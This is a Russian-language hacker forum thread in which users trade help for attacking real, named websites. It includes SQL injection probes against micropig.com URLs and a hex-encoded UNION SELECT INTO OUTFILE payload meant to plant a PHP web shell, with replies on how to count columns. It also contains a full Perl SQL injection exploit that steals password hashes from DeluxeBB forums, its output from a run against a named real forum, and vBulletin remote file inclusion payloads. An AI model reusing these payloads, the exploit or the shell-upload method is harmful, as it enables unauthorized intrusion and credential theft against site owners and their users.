Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0

    +, /**/, %20, %09, %0a, %0d, %2b.
     
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Чёт не разберусь никак с одной скулей...Может кто справится!?
    Code:
    http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
    http://micropig.com/microlink/category/58/start/3'
    
     
  3. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0

    помойму там жосткий фильтр стоит.
    ничего у меня не получается.

    ты уверен чот она там есть??


    на это тоже ругается:

    PHP:
    http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d
     
  4. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Как видишь, ошибка мускула есть :) логично предположить, что это инъекция :) Я вот тоже час парюсь, уже просто интересно стало, можно ли чего извлечь...

    возможно это инъекция после лимита, т.к.
    Code:
    http://micropig.com/microlink/category/58/start/3,1,1,2 -error
    
    http://micropig.com/microlink/category/58/start/3 offset 1 /* -no error
    http://micropig.com/microlink/category/58/start/3,1/* -no error
    
     
    1 person likes this.
  5. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Я про этот случай:
    http://micropig.com/microlink/?srch=2&start=30&searchtext=123'

    Нет там иньекта, он ругается каждый раз когда не может чтото найти, например:

    http://micropig.com/microlink/?srch=2&start=30&searchtext=123sdfsd
     
    #2145 Qwazar, 30 May 2008
    Last edited: 30 May 2008
    1 person likes this.
  6. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Ситуация такая, на серве мэджик квотес = он , то есть кавычки фильтруются, но можно провернуть скуль инъекцию, мне надо залить шелл ( файл прив есть, путь есть ), но как указать путь если он в кавычках ('/home/site/public_html/shell.php') ? Я помню, что Scipio писал как это можно обойти, но я тогда не врубился, может кто объяснит ?
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    AFoST
    Наличие ошибки не означает наличие инъекции. Инъекция это возможность влиять на запрос
    Сдесь:
    _http://micropig.com/microlink/?srch=2&start=30&searchtext=123
    такой возможности нет
    Сдесь:
    _http://micropig.com/microlink/category/58/start/3
    тройка это limit 3 т.е. можно повлиять так как ты описал:
    _http://micropig.com/microlink/category/58/start/3,1/*
    limit 3 offset 1(offset по умолчанию = 37)
    Но ничего путного от этой инъекции (в mysql) не добиться
     
  8. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    0nep@t0p
    Скинь сюда сайт, чтобы метод Scipio работал данные из первого запроса должны попадать во второй, тогда будет возможность залить шелл
     
  9. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 l-l00K
    Запрос такой:
    -16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    То есть мне надо составить такой запрос - -16+union+select+1,0x2D313620756E696F6E2073656C65637420273C3F70687020706870696E666F28293B203F3E2C322066726F6D206D7973716C2E7573657220696E746F206F757466696C6520272F686F6D652F736974652F7075626C69635F68746D6C2F7368656C6C2E706870272F2A,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    Где в хексе прописано - -16 union select '<?php phpinfo(); ?>,2 from mysql.user into outfile '/home/site/public_html/shell.php'/*
    Правильно ?
     
  10. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    А ты уверен что данные из 2-рого поля попадают в другой запрос и что в другом запросе 2 поля? Если это так, то по сюжету должно прокатить
     
    1 person likes this.
  11. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал
     
  12. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Подставь 0x27 по очереди в каждое поле, если появится ошибка, значит попадают, разумеется если вывод ошибок не выключен
     
  13. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Вывод не отключен, а как вычислить количество полей во втором запросе ?
     
  14. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Ну а дальше как с простой скулей, подбирай поля при помощи order by
     
    3 people like this.
  15. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Я говорю что вообще это вожможно)
    Данные попадают во второй запрос если там используются. Количество полей зависит только от их количества в запросе. И вообще не у одного Scipio хватило мозга придумать такое, раньше такое тоже пользовали.
     
    _________________________
  16. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    Ребятки подскажите, пожалуйста, почему не работает Exploit.
    Exploit…

    Code:
    #!/usr/bin/perl
    
    use IO::Socket;
    
    
    print q{
    ######################################################
    #   DeluxeBB  Remote SQL Injection Exploit           #
    #   vbulletin Remote SQL Injection Exploit           #
    #      //  SekoMirza // Turkish Hackerz              #
    ######################################################
    };
    
    if (!$ARGV[2]) {
    
    print q{ 
            Usage: perl dbbxpl.pl host /directory/ victim_userid 
      
           perl dbbxpl.pl www.somesite.com /forum/ 1
    
    
    };
    
    }
    
    
    $server = $ARGV[0];
    $dir    = $ARGV[1];
    $user   = $ARGV[2];
    $myuser = $ARGV[3];
    $mypass = $ARGV[4];
    $myid   = $ARGV[5];
    
    print "------------------------------------------------------------------------------------------------\r\n";
    print "[>] SERVER: $server\r\n";
    print "[>]    DIR: $dir\r\n";
    print "[>] USERID: $user\r\n";
    print "------------------------------------------------------------------------------------------------\r\n\r\n";
    
    $server =~ s/(http:\/\/)//eg;
    
    $path  = $dir;
    $path .= 
    
    "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
    
    20WHERE%20(uid='".$user ;
    
     
    print "[~] PREPARE TO CONNECT...\r\n";
    
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
    
    print "[+] CONNECTED ";
    print "[~] SENDING QUERY... ";
    print $socket "GET $path HTTP/1.1 ";
    print $socket "Host: $server ";
    print $socket "Accept: */* ";
    print $socket "Connection: close ";
    print "[+] DONE! ";
    
    
    
    print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
    while ($answer = <$socket>)
    {
    
     if ($answer =~/(\w{32})/)
    {
    
      if ($1 ne 0) {
         print "Password Hash is: ".$1." ";
    print "--------------------------------------------------------------------------------------\r\n";
    
          }
    exit();
    }
    
    
    }
    print "------------------------------------------------------------------------------------------------\r\n";
    
    #########################################################
    #Shoutz:                                                #
    #  							#
    # My Sweet -> Caramel 					#
    # For Mp3s -> Hypn0sis					#
    # For Support -> [WwW.StarHack.Org]			#
    # My Bro -> PhantomOrchid				#
    # My Preceptor -> Earnk Kazno 				#
    #########################################################
    C:\usr\bin>dbbxpl.pl www.forum.profiforex.ru / 24

    ######################################################
    # DeluxeBB Remote SQL Injection Exploit #
    # vbulletin Remote SQL Injection Exploit #
    # // SekoMirza // Turkish Hackerz #
    ######################################################
    --------------------------------------------------------------------------------
    ----------------
    [>] SERVER: www.forum.profiforex.ru
    [>] DIR: /
    [>] USERID: 24
    --------------------------------------------------------------------------------
    ----------------

    [~] PREPARE TO CONNECT...
    [+] CONNECTED [~] SENDING QUERY... [+] DONE! --[ REPORT ]-----------------------
    -------------------------------------------------------------
    --------------------------------------------------------------------------------
    ----------------

    Вернее он работает, но как-то не информативно.
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    дык могет форум та не бажный :)
     
  18. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    У меня никогда этот сплойт не работал.
     
    _________________________
  19. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    А проверить как как-то можно?
    Пытался вручную, но что-то не получается!
    Может и правда не бажный!?
    Надо искать какую-то альтернативу!
     
  20. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    Так тоже пытался…
    Только вот что-то не очень получается…
    Или это у меня руки кривые…!?



    vBulletin v3.6.5
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Пример:
    [site]/vb/includes/functions.php?classfile=[Shell-Attack]
    [site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
    [site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
     
Thread Status:
Not open for further replies.